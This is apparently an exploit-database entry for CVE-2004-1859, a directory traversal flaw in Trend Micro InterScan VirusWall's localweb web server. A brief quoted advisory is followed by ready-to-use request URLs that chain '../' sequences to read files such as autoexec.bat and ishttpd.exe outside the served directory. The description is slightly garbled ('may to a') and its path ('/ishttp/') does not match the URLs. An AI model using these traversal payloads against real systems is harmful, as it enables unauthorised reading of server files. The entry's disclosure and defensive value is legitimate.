Trend Micro Interscan VirusWall localweb - Directory Traversal
Author: Tri Huynh
type: webapps
platform: windows
port:
date_added: 2004-03-24
date_updated: 2017-07-19
verified: 1
codes: CVE-2004-1859;OSVDB-4549
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/9966/info
It has been reported that InterScan VirusWall may to a directory traversal vulnerability that may allow an attacker to request files from the '/ishttp/localweb' directory and any sub directories of 'localweb' with directory traversal strings such as '../'.
http://www.example.com/ishttpd/localweb/filename
http://www.example.com/ishttpd/localweb/java/?/../../../../../../../../autoexec.bat
http://www.example.com/ishttpd/localweb/java/?/../../../ishttpd.exe